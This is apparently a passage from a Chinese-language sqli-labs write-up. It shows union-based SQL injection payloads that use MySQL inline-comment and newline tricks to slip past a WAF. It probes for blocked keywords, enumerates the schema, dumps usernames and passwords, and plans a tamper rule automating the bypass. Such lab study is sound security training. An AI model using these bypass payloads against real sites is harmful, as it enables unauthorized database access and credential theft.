在这里将database()这个关键字分割,用
database/*!%23a%%0a*/()
因为在sql语句中,以下三种方式均可运行
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2,database/*!%23a%%0a*/() --+
这里得到数据库是security
法2 schema_name
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name from information_schema.schemata --+
错误
这里对其中的关键字进行测试,看看拦截了什么
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name --+
正常
http://127.0.0.1sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, information_schema.schemata --+
正常
http:/127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name from --+
正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name from --+
正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, from information_schema.schemata --+
异常
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name from information_schema.schemata --+
异常
因此这里对from进行绕过
采用老方法:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name /*!%23a%%0a*/ frominformation_schema.schemata --+
或者:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name /*!%23a%%0afrom*/information_schema.schemata --+
使用limit取出数据
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, schema_name /*!%23a%%0afrom*/ information_schema.schemata limit 1,1 --+
这样太慢,不如使用group_concat()
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, group_concat(schema_name) /*!%23a%%0afrom*/ information_schema.schemata --+
4. 取出security对应的表
select table_name from information_schema.tables where table_schema='security'
如法炮制:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, group_concat(table_name) /*!from*/ information_schema.tables where table_schema='security' --+
额,这只用了一个内联注释而已,这也太。。。。
还有下面的几种方法:对from处理
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, group_concat(table_name) /*!%23crow%0afrom*/ information_schema.tables where table_schema='security' --+
对security进行十六进制处理:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, group_concat(table_name) /*!%23crow%0afrom*/ information_schema.tables where table_schema=0x7365637572697479--+
5. 取出users对应的字段
查表:select table_name from information_schema.tables where table_schema='security'
查列:select column_name from information_schema.columns where table_name='users'
查字段的值:select username,password from security.users
一样
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, group_concat(column_name) from information_schema.columns where table_name='users' --+
啊这,我连from都没处理,waf放弃抵抗了吗?
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='users' --+
还好,还好,原来还在
6. 取出username,password的值
查字段:select username,password from security.users
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, username from security.users
起作用了
处理下from
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, username /*!%23crow%0afrom*/ security.users --+
这样太慢,一次取出所有数据吧
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!%23a%%0a*/ select 1,2, group_concat(concat_ws(0x7e, username, password)) from security.users --+
啊,这....
这防护。。。。
7. tamper编写
这里可以分析下,为了方便,可以将所有的空格,都替换为
/*!%23crow%0a*/
,再对from关键字替换为
/*!%23crow%0afrom*/
,再对database()替换为
database/*!%23crow%0a*/()
